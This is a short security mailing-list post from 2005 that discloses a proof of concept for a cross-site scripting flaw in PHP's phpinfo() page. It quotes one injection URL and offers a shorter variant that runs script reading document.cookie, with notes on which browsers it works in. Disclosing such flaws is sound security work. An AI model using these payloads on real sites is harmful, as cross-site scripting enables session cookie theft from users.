[Full-disclosure] PoC for PHP Cross Site Scripting (XSS) Vulnerability in phpinfo()
- To: Full Disclosure <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] PoC for PHP Cross Site Scripting (XSS) Vulnerability in phpinfo()
- From: Moritz Naumann <security@xxxxxxxxxxxxxxxxxx>
- Date: Fri, 04 Nov 2005 12:23:42 +0100
phole@xxxxxxxxxxxx wrote:
> PoC:
> phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
...or just use
phpinfo.php?[]=<script>alert(document.cookie);</script>
Saves some typing. Contrary to the above, this one only works on IE
(tested 6 on XP SP2) & Konqueror (tested 3.4.2), though.